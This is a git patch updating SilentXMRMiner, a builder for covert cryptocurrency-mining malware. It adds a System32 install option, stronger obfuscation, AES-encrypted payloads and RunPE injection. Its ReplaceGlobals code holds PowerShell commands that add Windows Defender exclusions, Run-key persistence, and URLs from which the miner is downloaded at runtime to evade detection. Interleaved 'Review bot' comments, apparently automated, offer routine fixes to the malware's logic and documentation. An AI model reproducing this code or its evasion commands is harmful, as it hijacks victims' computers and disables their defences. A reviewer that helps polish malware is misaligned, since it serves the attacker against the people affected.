From 1b5c1951a1b5dd14fcba5eecf3b4959648561438 Mon Sep 17 00:00:00 2001
From: UnamSanctam
Date: Sat, 10 Jul 2021 21:55:06 +0200
Subject: [PATCH] Updated to v1.4.1
* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
* Added backup servers for Online Downloader
* Added Install to System32 option (requires administrator permissions)
* Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit
* Fixed possiblity of duplicate random obfuscation strings
* Improved Loader
* Improved Watchdog
* Improved obfuscation
---
 README.md | 13 +-
 SilentXMRMiner/Advanced.Designer.vb | 288 +++++++++++-------
 SilentXMRMiner/Advanced.resx | 5 +
 SilentXMRMiner/Advanced.vb | 17 ++
 SilentXMRMiner/Codedom.vb | 41 ++-
 SilentXMRMiner/Form1.Designer.vb | 4 +-
 SilentXMRMiner/Form1.vb | 25 +-
 .../My Project/Resources.Designer.vb | 30 +-
 SilentXMRMiner/My Project/Resources.resx | 3 -
 SilentXMRMiner/Resources/Loader.cs | 28 +-
 SilentXMRMiner/Resources/Mandark.dll | Bin 6656 -> 0 bytes
 SilentXMRMiner/Resources/Program.cs | 190 +++++++++---
 SilentXMRMiner/Resources/Uninstaller.cs | 11 +-
 SilentXMRMiner/Resources/Watchdog.cs | 66 ++--
 .../Silent XMR Miner Builder.vbproj | 3 -
 15 files changed, 479 insertions(+), 245 deletions(-)
 delete mode 100644 SilentXMRMiner/Resources/Mandark.dll
diff --git a/README.md b/README.md
index d123276..5223477 100644
--- a/README.md
+++ b/README.md
@@ -1,7 +1,7 @@
-# SilentXMRMiner v1.4 - Based on Lime Miner v0.3
+# SilentXMRMiner v1.4.1 - Based on Lime Miner v0.3
 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**.
@@ -41,8 +41,17 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w
 ## Changes
+### v1.4.1 (10/07/2021)
+* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
+* Added backup servers for Online Downloader
+* Added Install to System32 option (requires administrator permissions)
+* Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit
+* Fixed possiblity of duplicate random obfuscation strings
+* Improved Loader
+* Improved Watchdog
+* Improved obfuscation
 ### v1.4 (05/07/2021)
-**v1.4 is the final update before the new, greatly improved unified miner that I'm working on.**
+**v1.4.\* is the final update before the new, greatly improved unified miner that I'm working on.**
 * Added the Online Downloader option that makes the miner download the miner binary (from GitHub) during runtime to greatly decrease file size (to less then 100kb) and detections - Also added a cache so that it won't have to download the miner on every start
 * Made the Task Scheduler task start for all users
 * Improved Watchdog program flow
diff --git a/SilentXMRMiner/Advanced.Designer.vb b/SilentXMRMiner/Advanced.Designer.vb
index 030e86c..eacc58c 100644
--- a/SilentXMRMiner/Advanced.Designer.vb
+++ b/SilentXMRMiner/Advanced.Designer.vb
@@ -25,32 +25,37 @@ Partial Class Advanced Me.components = New System.ComponentModel.Container() Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(Advanced)) Me.TooltipHelper = New System.Windows.Forms.ToolTip(Me.components) - Me.Label26 = New System.Windows.Forms.Label() - Me.Label19 = New System.Windows.Forms.Label() - Me.Label1 = New System.Windows.Forms.Label() - Me.Label3 = New System.Windows.Forms.Label() - Me.Label6 = New System.Windows.Forms.Label() - Me.Label9 = New System.Windows.Forms.Label() - Me.Label11 = New System.Windows.Forms.Label() Me.MephTheme1 = New SilentXMRMiner.MephTheme() + Me.PictureBox2 = New System.Windows.Forms.PictureBox() + Me.Label7 = New System.Windows.Forms.Label() + Me.Label8 = New System.Windows.Forms.Label() + Me.toggleInstallSystem32 = New SilentXMRMiner.MephToggleSwitch() + Me.Label11 = New System.Windows.Forms.Label() Me.Label12 = New System.Windows.Forms.Label() Me.toggleDownloader = New SilentXMRMiner.MephToggleSwitch() + Me.Label9 = New System.Windows.Forms.Label() Me.Label10 = New System.Windows.Forms.Label() Me.toggleAdministrator = New SilentXMRMiner.MephToggleSwitch() Me.PictureBox1 = New System.Windows.Forms.PictureBox() + Me.Label26 = New System.Windows.Forms.Label() Me.Label27 = New System.Windows.Forms.Label() Me.toggleEnableDebug = New SilentXMRMiner.MephToggleSwitch() Me.Label20 = New System.Windows.Forms.Label() + Me.Label19 = New System.Windows.Forms.Label() Me.chkAdvanced = New SilentXMRMiner.MephCheckBox() Me.txtAdvParam = New SilentXMRMiner.MephTextBox() + Me.Label1 = New System.Windows.Forms.Label() Me.Label2 = New System.Windows.Forms.Label() Me.toggleObfuscation = New SilentXMRMiner.MephToggleSwitch() + Me.Label3 = New System.Windows.Forms.Label() Me.Label4 = New System.Windows.Forms.Label() Me.toggleKillWD = New SilentXMRMiner.MephToggleSwitch() Me.Label5 = New System.Windows.Forms.Label() + Me.Label6 = New 
System.Windows.Forms.Label() Me.chkRemoteConfig = New SilentXMRMiner.MephCheckBox() Me.txtRemoteConfig = New SilentXMRMiner.MephTextBox() Me.MephTheme1.SuspendLayout() + CType(Me.PictureBox2, System.ComponentModel.ISupportInitialize).BeginInit() CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit() Me.SuspendLayout() ' 
@@ -63,116 +68,15 @@ Partial Class Advanced Me.TooltipHelper.IsBalloon = True Me.TooltipHelper.ReshowDelay = 100 ' - 'Label26 - ' - Me.Label26.AutoSize = True - Me.Label26.BackColor = System.Drawing.Color.Transparent - Me.Label26.Cursor = System.Windows.Forms.Cursors.Help - Me.Label26.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label26.ForeColor = System.Drawing.Color.Teal - Me.Label26.Location = New System.Drawing.Point(59, 280) - Me.Label26.Name = "Label26" - Me.Label26.Size = New System.Drawing.Size(13, 13) - Me.Label26.TabIndex = 60 - Me.Label26.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label26, "Will enable DEBUG mode which will display errors when they occur in the miner. !W" & - "ARNING! Should only be used when testing!") - ' - 'Label19 - ' - Me.Label19.AutoSize = True - Me.Label19.BackColor = System.Drawing.Color.Transparent - Me.Label19.Cursor = System.Windows.Forms.Cursors.Help - Me.Label19.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label19.ForeColor = System.Drawing.Color.Teal - Me.Label19.Location = New System.Drawing.Point(379, 236) - Me.Label19.Name = "Label19" - Me.Label19.Size = New System.Drawing.Size(13, 13) - Me.Label19.TabIndex = 66 - Me.Label19.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label19, "The parameters to mine with. ONLY CHANGE THESE IF YOU KNOW WHAT YOU ARE DOING.") - ' - 'Label1 - ' - Me.Label1.AutoSize = True - Me.Label1.BackColor = System.Drawing.Color.Transparent - Me.Label1.Cursor = System.Windows.Forms.Cursors.Help - Me.Label1.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label1.ForeColor = System.Drawing.Color.Teal - Me.Label1.Location = New System.Drawing.Point(146, 78) - Me.Label1.Name = "Label1" - Me.Label1.Size = New System.Drawing.Size(13, 13) - Me.Label1.TabIndex = 70 - Me.Label1.Text = "?" 
- Me.TooltipHelper.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip")) - ' - 'Label3 - ' - Me.Label3.AutoSize = True - Me.Label3.BackColor = System.Drawing.Color.Transparent - Me.Label3.Cursor = System.Windows.Forms.Cursors.Help - Me.Label3.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label3.ForeColor = System.Drawing.Color.Teal - Me.Label3.Location = New System.Drawing.Point(173, 168) - Me.Label3.Name = "Label3" - Me.Label3.Size = New System.Drawing.Size(13, 13) - Me.Label3.TabIndex = 73 - Me.Label3.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label3, "Will run commands to exclude the general folders that the miner uses or can use. " & - "This is good to enable to bypass future detections." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This command requires Admin" & - "istrator privileges!" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10)) - ' - 'Label6 - ' - Me.Label6.AutoSize = True - Me.Label6.BackColor = System.Drawing.Color.Transparent - Me.Label6.Cursor = System.Windows.Forms.Cursors.Help - Me.Label6.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label6.ForeColor = System.Drawing.Color.Teal - Me.Label6.Location = New System.Drawing.Point(378, 163) - Me.Label6.Name = "Label6" - Me.Label6.Size = New System.Drawing.Size(13, 13) - Me.Label6.TabIndex = 76 - Me.Label6.Text = "?" 
- Me.TooltipHelper.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip")) - ' - 'Label9 - ' - Me.Label9.AutoSize = True - Me.Label9.BackColor = System.Drawing.Color.Transparent - Me.Label9.Cursor = System.Windows.Forms.Cursors.Help - Me.Label9.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label9.ForeColor = System.Drawing.Color.Teal - Me.Label9.Location = New System.Drawing.Point(140, 138) - Me.Label9.Name = "Label9" - Me.Label9.Size = New System.Drawing.Size(13, 13) - Me.Label9.TabIndex = 84 - Me.Label9.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label9, "Will make the miner ask for administrator privileges to run." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This is required fo" & - "r the Bypass Windows Defender option. This option will also increase the hashrat" & - "e.") - ' - 'Label11 - ' - Me.Label11.AutoSize = True - Me.Label11.BackColor = System.Drawing.Color.Transparent - Me.Label11.Cursor = System.Windows.Forms.Cursors.Help - Me.Label11.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label11.ForeColor = System.Drawing.Color.Teal - Me.Label11.Location = New System.Drawing.Point(119, 108) - Me.Label11.Name = "Label11" - Me.Label11.Size = New System.Drawing.Size(13, 13) - Me.Label11.TabIndex = 87 - Me.Label11.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label11, "Enable this to download the miner from online (GitHub) instead of embedding it in" & - " the file." 
& Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This will greatly decrease the file size and usually greatly decreas" & - "es detections.") - ' 'MephTheme1 ' Me.MephTheme1.AccentColor = System.Drawing.Color.DarkRed Me.MephTheme1.Anchor = System.Windows.Forms.AnchorStyles.None Me.MephTheme1.BackColor = System.Drawing.Color.FromArgb(CType(CType(28, Byte), Integer), CType(CType(28, Byte), Integer), CType(CType(28, Byte), Integer)) + Me.MephTheme1.Controls.Add(Me.PictureBox2) + Me.MephTheme1.Controls.Add(Me.Label7) + Me.MephTheme1.Controls.Add(Me.Label8) + Me.MephTheme1.Controls.Add(Me.toggleInstallSystem32) Me.MephTheme1.Controls.Add(Me.Label11) Me.MephTheme1.Controls.Add(Me.Label12) Me.MephTheme1.Controls.Add(Me.toggleDownloader) 
@@ -205,6 +109,72 @@ Partial Class Advanced Me.MephTheme1.TabIndex = 0 Me.MephTheme1.Text = "Silent XMR Miner Builder" ' + 'PictureBox2 + ' + Me.PictureBox2.BackColor = System.Drawing.Color.Transparent + Me.PictureBox2.Image = Global.SilentXMRMiner.My.Resources.Resources.microsoft_admin + Me.PictureBox2.Location = New System.Drawing.Point(242, 196) + Me.PictureBox2.Name = "PictureBox2" + Me.PictureBox2.Size = New System.Drawing.Size(20, 20) + Me.PictureBox2.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage + Me.PictureBox2.TabIndex = 91 + Me.PictureBox2.TabStop = False + ' + 'Label7 + ' + Me.Label7.AutoSize = True + Me.Label7.BackColor = System.Drawing.Color.Transparent + Me.Label7.Cursor = System.Windows.Forms.Cursors.Help + Me.Label7.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label7.ForeColor = System.Drawing.Color.Teal + Me.Label7.Location = New System.Drawing.Point(127, 198) + Me.Label7.Name = "Label7" + Me.Label7.Size = New System.Drawing.Size(13, 13) + Me.Label7.TabIndex = 90 + Me.Label7.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip")) + ' + 'Label8 + ' + Me.Label8.AutoSize = True + Me.Label8.BackColor = System.Drawing.Color.Transparent + Me.Label8.Font = New System.Drawing.Font("Segoe UI", 9.5!) 
+ Me.Label8.ForeColor = System.Drawing.Color.Gray + Me.Label8.Location = New System.Drawing.Point(10, 195) + Me.Label8.Margin = New System.Windows.Forms.Padding(2, 0, 2, 0) + Me.Label8.Name = "Label8" + Me.Label8.Size = New System.Drawing.Size(119, 17) + Me.Label8.TabIndex = 89 + Me.Label8.Text = "Install to System32:" + ' + 'toggleInstallSystem32 + ' + Me.toggleInstallSystem32.BackColor = System.Drawing.Color.Transparent + Me.toggleInstallSystem32.Checked = False + Me.toggleInstallSystem32.ForeColor = System.Drawing.Color.Black + Me.toggleInstallSystem32.Location = New System.Drawing.Point(189, 193) + Me.toggleInstallSystem32.Margin = New System.Windows.Forms.Padding(2) + Me.toggleInstallSystem32.Name = "toggleInstallSystem32" + Me.toggleInstallSystem32.Size = New System.Drawing.Size(50, 24) + Me.toggleInstallSystem32.TabIndex = 88 + Me.toggleInstallSystem32.Text = "Enable Nicehash Mining" + ' + 'Label11 + ' + Me.Label11.AutoSize = True + Me.Label11.BackColor = System.Drawing.Color.Transparent + Me.Label11.Cursor = System.Windows.Forms.Cursors.Help + Me.Label11.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label11.ForeColor = System.Drawing.Color.Teal + Me.Label11.Location = New System.Drawing.Point(119, 108) + Me.Label11.Name = "Label11" + Me.Label11.Size = New System.Drawing.Size(13, 13) + Me.Label11.TabIndex = 87 + Me.Label11.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label11, "Enable this to download the miner from online (GitHub) instead of embedding it in" & + " the file." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This will greatly decrease the file size and usually greatly decreas" & + "es detections.") + ' 'Label12 ' Me.Label12.AutoSize = True 
@@ -230,6 +200,22 @@ Partial Class Advanced Me.toggleDownloader.TabIndex = 85 Me.toggleDownloader.Text = "Enable Nicehash Mining" ' + 'Label9 + ' + Me.Label9.AutoSize = True + Me.Label9.BackColor = System.Drawing.Color.Transparent + Me.Label9.Cursor = System.Windows.Forms.Cursors.Help + Me.Label9.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label9.ForeColor = System.Drawing.Color.Teal + Me.Label9.Location = New System.Drawing.Point(140, 138) + Me.Label9.Name = "Label9" + Me.Label9.Size = New System.Drawing.Size(13, 13) + Me.Label9.TabIndex = 84 + Me.Label9.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label9, "Will make the miner ask for administrator privileges to run." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This is required fo" & + "r the Bypass Windows Defender option. This option will also increase the hashrat" & + "e.") + ' 'Label10 ' Me.Label10.AutoSize = True @@ -266,6 +252,21 @@ Partial Class Advanced Me.PictureBox1.TabIndex = 81 Me.PictureBox1.TabStop = False ' + 'Label26 + ' + Me.Label26.AutoSize = True + Me.Label26.BackColor = System.Drawing.Color.Transparent + Me.Label26.Cursor = System.Windows.Forms.Cursors.Help + Me.Label26.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label26.ForeColor = System.Drawing.Color.Teal + Me.Label26.Location = New System.Drawing.Point(59, 280) + Me.Label26.Name = "Label26" + Me.Label26.Size = New System.Drawing.Size(13, 13) + Me.Label26.TabIndex = 60 + Me.Label26.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label26, "Will enable DEBUG mode which will display errors when they occur in the miner. !W" & + "ARNING! Should only be used when testing!") + ' 'Label27 ' Me.Label27.AutoSize = True 
@@ -303,6 +304,20 @@ Partial Class Advanced Me.Label20.TabIndex = 67 Me.Label20.Text = "Advanced Parameters:" ' + 'Label19 + ' + Me.Label19.AutoSize = True + Me.Label19.BackColor = System.Drawing.Color.Transparent + Me.Label19.Cursor = System.Windows.Forms.Cursors.Help + Me.Label19.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label19.ForeColor = System.Drawing.Color.Teal + Me.Label19.Location = New System.Drawing.Point(379, 236) + Me.Label19.Name = "Label19" + Me.Label19.Size = New System.Drawing.Size(13, 13) + Me.Label19.TabIndex = 66 + Me.Label19.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label19, "The parameters to mine with. ONLY CHANGE THESE IF YOU KNOW WHAT YOU ARE DOING.") + ' 'chkAdvanced ' Me.chkAdvanced.AccentColor = System.Drawing.Color.ForestGreen @@ -333,6 +348,20 @@ Partial Class Advanced Me.txtAdvParam.UseSystemPasswordChar = False Me.txtAdvParam.WordWrap = False ' + 'Label1 + ' + Me.Label1.AutoSize = True + Me.Label1.BackColor = System.Drawing.Color.Transparent + Me.Label1.Cursor = System.Windows.Forms.Cursors.Help + Me.Label1.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label1.ForeColor = System.Drawing.Color.Teal + Me.Label1.Location = New System.Drawing.Point(146, 78) + Me.Label1.Name = "Label1" + Me.Label1.Size = New System.Drawing.Size(13, 13) + Me.Label1.TabIndex = 70 + Me.Label1.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip")) + ' 'Label2 ' Me.Label2.AutoSize = True 
@@ -358,6 +387,22 @@ Partial Class Advanced Me.toggleObfuscation.TabIndex = 68 Me.toggleObfuscation.Text = "Enable Nicehash Mining" ' + 'Label3 + ' + Me.Label3.AutoSize = True + Me.Label3.BackColor = System.Drawing.Color.Transparent + Me.Label3.Cursor = System.Windows.Forms.Cursors.Help + Me.Label3.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label3.ForeColor = System.Drawing.Color.Teal + Me.Label3.Location = New System.Drawing.Point(173, 168) + Me.Label3.Name = "Label3" + Me.Label3.Size = New System.Drawing.Size(13, 13) + Me.Label3.TabIndex = 73 + Me.Label3.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label3, "Will run commands to exclude the general folders that the miner uses or can use. " & + "This is good to enable to bypass future detections." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This command requires Admin" & + "istrator privileges!" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10)) + ' 'Label4 ' Me.Label4.AutoSize = True @@ -395,6 +440,20 @@ Partial Class Advanced Me.Label5.TabIndex = 77 Me.Label5.Text = "Remote Configuration:" ' + 'Label6 + ' + Me.Label6.AutoSize = True + Me.Label6.BackColor = System.Drawing.Color.Transparent + Me.Label6.Cursor = System.Windows.Forms.Cursors.Help + Me.Label6.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label6.ForeColor = System.Drawing.Color.Teal + Me.Label6.Location = New System.Drawing.Point(378, 163) + Me.Label6.Name = "Label6" + Me.Label6.Size = New System.Drawing.Size(13, 13) + Me.Label6.TabIndex = 76 + Me.Label6.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip")) + ' 'chkRemoteConfig ' Me.chkRemoteConfig.AccentColor = System.Drawing.Color.ForestGreen 
@@ -444,6 +503,7 @@ Partial Class Advanced Me.TransparencyKey = System.Drawing.Color.Fuchsia Me.MephTheme1.ResumeLayout(False) Me.MephTheme1.PerformLayout() + CType(Me.PictureBox2, System.ComponentModel.ISupportInitialize).EndInit() CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).EndInit() Me.ResumeLayout(False) @@ -475,4 +535,8 @@ Partial Class Advanced Friend WithEvents Label11 As Label Friend WithEvents Label12 As Label Friend WithEvents toggleDownloader As MephToggleSwitch + Friend WithEvents PictureBox2 As PictureBox + Friend WithEvents Label7 As Label + Friend WithEvents Label8 As Label + Friend WithEvents toggleInstallSystem32 As MephToggleSwitch End Class diff --git a/SilentXMRMiner/Advanced.resx b/SilentXMRMiner/Advanced.resx index 7293b0f..bca8869 100644 --- a/SilentXMRMiner/Advanced.resx +++ b/SilentXMRMiner/Advanced.resx @@ -120,6 +120,11 @@ 17, 17 + + Will try to install to System32, if unsuccessful it will try to install to the path chosen in the "Install" tab. It's recommended to enable this when using 'Run as Administrator'. +This command requires Administrator privileges! + + Pauses the miner compilation when the Watchdog DLL and/or Miner DLL is compiled to allow manual obfuscation of the file. You can find the file in the same folder as the miner location you specified with the name MINERFILE-watchdog.dll or MINERFILE-miner.dll. diff --git a/SilentXMRMiner/Advanced.vb b/SilentXMRMiner/Advanced.vb index 04df9a3..9cb9a34 100644 --- a/SilentXMRMiner/Advanced.vb +++ b/SilentXMRMiner/Advanced.vb 
@@ -30,6 +30,23 @@ Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged
 If toggleKillWD.Checked Then
 toggleAdministrator.Checked = True
+ toggleInstallSystem32.Checked = True
+ End If
+ End Sub
+
+ Private Sub toggleInstallSystem32_CheckedChanged(sender As Object) Handles toggleInstallSystem32.CheckedChanged
+ If toggleInstallSystem32.Checked Then
+ toggleAdministrator.Checked = True
+ End If
+ End Sub
+
+ Private Sub toggleAdministrator_CheckedChanged(sender As Object) Handles toggleAdministrator.CheckedChanged
+ If toggleAdministrator.Checked Then
+ toggleInstallSystem32.Checked = True
+ toggleKillWD.Checked = True
+ Else
+ toggleInstallSystem32.Checked = False
+ toggleKillWD.Checked = False
 End If
 End Sub
 End Class
\ No newline at end of file
diff --git a/SilentXMRMiner/Codedom.vb b/SilentXMRMiner/Codedom.vb
index cc1b24f..f2d9e60 100644
--- a/SilentXMRMiner/Codedom.vb
+++ b/SilentXMRMiner/Codedom.vb
@@ -10,6 +10,8 @@ Public Class Codedom
 Public Shared LoaderOK As Boolean = False
 Public Shared UninstallerOK As Boolean = False
 Public Shared F As Form1
+
+ Public Shared GlobalRProgram As String
 Public Shared Sub MinerCompiler(ByVal Path As String, ByVal Code As String, ByVal Res As String)
 MinerOK = False
@@ -17,7 +19,9 @@ Public Class Codedom
 providerOptions.Add("CompilerVersion", "v4.0")
 Dim CodeProvider As New CSharpCodeProvider(providerOptions)
 Dim Parameters As New CompilerParameters
- Dim OP As String = " /target:library /platform:x64 /optimize "
+ Dim OP As String = " /target:winexe /platform:x64 /optimize "
+
+ GlobalRProgram = F.Randomi(F.rand.Next(5, 40))
 With Parameters
 .GenerateExecutable = False
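Review bot: Checking `toggleInstallSystem32` on its own also switches on `toggleKillWD`, because `toggleInstallSystem32_CheckedChanged` sets `toggleAdministrator.Checked = True` and the new `toggleAdministrator_CheckedChanged` then turns on both of its dependents; nothing in the handlers or in the System32 tooltip added to Advanced.resx says the two options are tied together. The three handlers also re-enter one another through their `.Checked` assignments, and the cascade only settles if assigning an already-set value raises no further CheckedChanged, which depends on MephToggleSwitch and is not visible here. If the coupling is intended, a comment on `toggleAdministrator_CheckedChanged` such as `' Administrator, Install to System32 and Kill WD are switched on and off as a group` would stop the next reader from treating it as a bug; if it is not, the `If toggleAdministrator.Checked Then` branch should only be doing the clearing in its `Else` part.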
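Review bot: The new `Dim OP As String = " /target:winexe /platform:x64 /optimize "` contradicts the `.GenerateExecutable = False` that still follows it inside `With Parameters`; CodeDom emits its own target switch from that flag and appends `CompilerOptions` after it, so the winexe target presumably wins only because csc honours the last `/target`, and nothing in the file states which output type is intended. The same pair appears again in the hunk at `@@ -79,7 +82,9 @@`. A one-line comment next to the option, e.g. `' /target:winexe in CompilerOptions overrides the library target implied by GenerateExecutable = False`, or setting the flag to match, would make the intent explicit. `GlobalRProgram` is also re-randomised in both compile paths, so whether the artifacts that go through `ReplaceGlobals` see the same `RProgram` name depends on call order that is not visible in this hunk.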
@@ -36,7 +40,6 @@ Public Class Codedom
 F.txtLog.Text = F.txtLog.Text + ("Creating resources..." + vbNewLine)
 Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Res + ".Resources")
- R.AddResource(F.Resources_dll, F.AES_Encryptor(My.Resources.Mandark))
 If Not F.FA.toggleDownloader.Checked Then
 R.AddResource(F.Resources_xmrig, F.AES_Encryptor(My.Resources.xmrig))
 End If
@@ -79,7 +82,9 @@ Public Class Codedom
 providerOptions.Add("CompilerVersion", "v4.0")
 Dim CodeProvider As New CSharpCodeProvider(providerOptions)
 Dim Parameters As New CompilerParameters
- Dim OP As String = " /target:library /platform:x64 /optimize "
+ Dim OP As String = " /target:winexe /platform:x64 /optimize "
+
+ GlobalRProgram = F.Randomi(F.rand.Next(5, 40))
 With Parameters
 .GenerateExecutable = False
@@ -150,7 +155,7 @@ Public Class Codedom
 Dim Resources_Loader = F.Randomi(rand.Next(5, 40))
 Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Resources_Loader + ".Resources")
- R.AddResource(Resources_Program, ProgramBytes.Reverse().ToArray())
+ R.AddResource(Resources_Program, F.AES_Encryptor(ProgramBytes))
 R.Generate()
 End Using
@@ -233,7 +238,7 @@ Public Class Codedom
 Public Shared Sub ReplaceGlobals(ByRef stringb As StringBuilder)
 If F.FA.toggleKillWD.Checked Then
 stringb.Replace("DefKillWD", "true")
- stringb.Replace("#KillWDCommands", Convert.ToBase64String(Encoding.ASCII.GetBytes("powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit").Reverse().ToArray()))
+ stringb.Replace("#KillWDCommands", F.EncryptString("/c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit"))
 End If
 If F.FA.toggleEnableDebug.Checked Then
@@ -264,7 +269,13 @@ Public Class Codedom
 installdir = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)"
 End Select
- stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & "," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+ If F.FA.toggleInstallSystem32.Checked Then
+ stringb.Replace("DefSystem32", "true")
+ stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & ")," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+ Else
+ stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & "," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+ End If
+
 If F.toggleWatchdog.Checked Then
 stringb.Replace("DefWatchdog", "true")
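Review bot: In the `@@ -264,7 +269,13 @@` hunk the System32 branch chooses `Environment.SystemDirectory` purely on `IsInRole(WindowsBuiltInRole.Administrator)` at the moment the path expression is evaluated; there is no attempt followed by a fallback, so the tooltip this commit adds to Advanced.resx ("if unsuccessful it will try to install to the path chosen in the 'Install' tab") describes behaviour the generated expression does not have. The documentation should match the code: `Installs to System32 when the process runs as Administrator, otherwise to the path chosen in the "Install" tab` states what this line actually does. The enclosing `ReplaceGlobals` starts before this hunk and continues after it.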
@@ -288,18 +299,20 @@ Public Class Codedom
 stringb.Replace("%Guid%", Guid.NewGuid.ToString)
- stringb.Replace("#STARTDELAY", F.txtStartDelay.Text)
 stringb.Replace("#KEY", F.AESKEY)
 stringb.Replace("#SALT", F.SALT)
 stringb.Replace("#IV", F.IV)
 stringb.Replace("#DLLSTR", F.EncryptString("Mandark.Mandark"))
 stringb.Replace("#DLLOAD", F.EncryptString("Load"))
 stringb.Replace("#REGKEY", F.EncryptString("Software\Microsoft\Windows\CurrentVersion\Run\"))
+ stringb.Replace("#SANCTAMLIBSURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=libs"))
+ stringb.Replace("#SANCTAMMINERURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig"))
 stringb.Replace("#LIBSURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/libs.zip"))
 stringb.Replace("#MINERURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip"))
 stringb.Replace("#LIBSPATH", F.EncryptString("Microsoft\Libs\"))
 stringb.Replace("#WATCHDOG", F.EncryptString("sihost64"))
